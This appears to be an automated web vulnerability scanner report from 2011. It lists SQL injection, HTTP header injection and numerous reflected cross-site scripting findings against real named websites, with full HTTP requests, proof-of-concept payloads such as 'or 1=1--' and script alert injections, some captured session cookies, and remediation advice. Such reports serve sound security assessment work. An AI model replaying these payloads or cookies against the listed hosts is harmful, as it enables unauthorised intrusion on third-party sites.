SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
1.1. http://www.cvtelecom.cv/ [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.cvtelecom.cv
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 20242989%20or%201%3d1--%20 and 20242989%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /?120242989%20or%201%3d1--%20=1 HTTP/1.1 Host: www.cvtelecom.cv Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:17:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.11 Set-Cookie: SESSd45f694fe0a9cd7f98205f36db4e321c=pl2aq2cevdnsrm7538jfmi53u4; path=/; domain=.cvtelecom.cv Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 15 May 2011 13:17:27 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25423
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
The value of REST URL parameter 1 is copied into the Location response header. The payload dc131%0d%0a03859863396 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the ids request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb330"><script>alert(1)</script>c8f40f3c5bb was submitted in the ids parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /timeout.php?ids=20468cb330"><script>alert(1)</script>c8f40f3c5bb HTTP/1.1 Host: a.ligatus.com Proxy-Connection: keep-alive Referer: http://www.upc.nl/upclive/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
3.2. http://a.ligatus.com/timeout.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.ligatus.com
Path:
/timeout.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18ee8"><script>alert(1)</script>10488149e13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /timeout.php?ids=2/18ee8"><script>alert(1)</script>10488149e130468 HTTP/1.1 Host: a.ligatus.com Proxy-Connection: keep-alive Referer: http://www.upc.nl/upclive/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload c6f80<script>alert(1)</script>ee62fdbac8 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload c28e6<script>alert(1)</script>0baf0e78e5e was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload d0ec8<script>alert(1)</script>0c3f4987c6a was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 47c0e<script>alert(1)</script>05723e98a27 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a41fb<script>alert(1)</script>adc6871f1d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cfc0e<script>alert(1)</script>4318a75fb08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ade5c<script>alert(1)</script>67b2701a442 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsade5c<script>alert(1)</script>67b2701a442/chatcisp1/safe-monitor.js?ps_h=1Otf%26ps_t%3D1305465392691 HTTP/1.1 Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.cisp.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Sun, 15 May 2011 13:16:39 GMT Content-Length: 569
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 407ec<a>caf30e524a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /js/chatcisp1407ec<a>caf30e524a5/safe-monitor.js?ps_h=1Otf%26ps_t%3D1305465392691 HTTP/1.1 Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.cisp.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Sun, 15 May 2011 13:16:41 GMT Content-Length: 551
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47b9a<script>alert(1)</script>c2f4fa10813 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 393de<a>8964a54983f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 335fa<script>alert(1)</script>14eac9dc13f was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/j2global/mbox/standard?mboxHost=www.new.onebox.com&mboxSession=1305465387100-728648&mboxPage=1305465831614-198194&screenHeight=1200&screenWidth=1920&browserWidth=1020&browserHeight=945&browserTimeOffset=-300&colorDepth=32&mboxCount=1&mbox=OBR_New_Pricing335fa<script>alert(1)</script>14eac9dc13f&mboxId=0&mboxTime=1305447831706&mboxURL=http%3A%2F%2Fwww.new.onebox.com%2Fpricing-receptionist&mboxReferrer=http%3A%2F%2Fwww.new.onebox.com%2Fhome&mboxVersion=39 HTTP/1.1 Host: j2global.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.new.onebox.com/pricing-receptionist User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 211 Date: Sun, 15 May 2011 13:25:44 GMT Server: Test & Target
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload c9469<script>alert(1)</script>497805b5141 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 15 May 2011 13:19:09 GMT Cache-Control: max-age=86400, private Expires: Mon, 16 May 2011 13:19:09 GMT X-Proc-ms: 0 Content-Type: application/javascript;charset=ISO-8859-1 Vary: Accept-Encoding Date: Sun, 15 May 2011 13:19:09 GMT Content-Length: 128
/* * JavaScript include error: * The customer code "H05525C9469<SCRIPT>ALERT(1)</SCRIPT>497805B5141" was not recognized. */
3.15. http://mods4rides.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mods4rides.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bb6e"><script>alert(1)</script>40d92ee4d7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7bb6e\"><script>alert(1)</script>40d92ee4d7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?7bb6e"><script>alert(1)</script>40d92ee4d7c=1 HTTP/1.1 Host: mods4rides.com Proxy-Connection: keep-alive Referer: http://shops.oscommerce.com/directory/goto,43691 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the extra_url_query_string request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5af9f"><script>alert(1)</script>72a5800a358 was submitted in the extra_url_query_string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /offers/23073174/share?extra_url_query_string=706c69643d3832343134313339395af9f"><script>alert(1)</script>72a5800a358 HTTP/1.1 Host: onebox.extole.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _dominus_pid%3A23073174=BAgiDjgyNDE0MTM5OQ%3D%3D--8e2b080a34253b88d9d0fc37d226375f2d43d303; _dominus_token=1a1831e3bdc5a45c926fca7607d04f8af00dd39c
The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 198d5<x%20style%3dx%3aexpression(alert(1))>5b0a294aec3 was submitted in the name parameter. This input was echoed as 198d5<x style=x:expression(alert(1))>5b0a294aec3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /serve/fb/pdc?cat=&name=landing198d5<x%20style%3dx%3aexpression(alert(1))>5b0a294aec3&sid=1888 HTTP/1.1 Host: pixel.fetchback.com Proxy-Connection: keep-alive Referer: http://www.new.onebox.com/home User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4dab5'-alert(1)-'2e2335fcaa6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the back request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96dac'-alert(1)-'4e13140a073 was submitted in the back parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 15 May 2011 15:28:01 GMT Server: Apache P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 19038
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr"> <head> <title>WideVOIP</title> <meta ht ...[SNIP]... <script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/authentication.php?back=order.php?step=196dac'-alert(1)-'4e13140a073', 'WideVOIP', 'favoris');</script> ...[SNIP]...
3.20. https://shop.widevoip.com/authentication.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.widevoip.com
Path:
/authentication.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a809e'-alert(1)-'0dd4573b18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dbef'-alert(1)-'5b40c63d92d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1f6d'-alert(1)-'bb10e0eb6e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbfc3'-alert(1)-'69ac8c7469c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df848'-alert(1)-'1e48a97705d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d865'-alert(1)-'3fd3c2efa9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr"> <head> <title>WideVOIP</title> <meta ht ...[SNIP]... <script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/index.php/index.php8d865'-alert(1)-'3fd3c2efa9b', 'WideVOIP', 'favoris');</script> ...[SNIP]...
3.26. https://shop.widevoip.com/index.php/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.widevoip.com
Path:
/index.php/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51537'-alert(1)-'10e189e9a5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5da4c'-alert(1)-'03985f41b86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f822'-alert(1)-'980798d9648 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4da3'-alert(1)-'3d4cd63b528 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ebf3'-alert(1)-'989b9edb336 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Sun, 15 May 2011 15:33:01 GMT Server: Apache P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 17207
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr"> <head> <title>WideVOIP</title> <meta ht ...[SNIP]... <script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/order.php6ebf3'-alert(1)-'989b9edb336?step=1', 'WideVOIP', 'favoris');</script> ...[SNIP]...
3.31. https://shop.widevoip.com/order.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.widevoip.com
Path:
/order.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fba44'-alert(1)-'92ed8ffb93c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the step request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3564'-alert(1)-'7235c17c5e2 was submitted in the step parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd069'-alert(1)-'38a4fe86abd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Sun, 15 May 2011 15:30:56 GMT Server: Apache P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 17198
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr"> <head> <title>WideVOIP</title> <meta ht ...[SNIP]... <script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/prices-drop.phpbd069'-alert(1)-'38a4fe86abd', 'WideVOIP', 'favoris');</script> ...[SNIP]...
3.34. https://shop.widevoip.com/prices-drop.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.widevoip.com
Path:
/prices-drop.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85341'-alert(1)-'2eed22d8f74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 15 May 2011 15:28:22 GMT Server: Apache P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 42878
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr"> <head> <title>WideVOIP - Promotions</titl ...[SNIP]... <script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/prices-drop.php?85341'-alert(1)-'2eed22d8f74=1', 'WideVOIP', 'favoris');</script> ...[SNIP]...
3.35. http://shops.oscommerce.com/live_shops_frameset_header.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shops.oscommerce.com
Path:
/live_shops_frameset_header.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62e85"><script>alert(1)</script>fbac2c01b52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
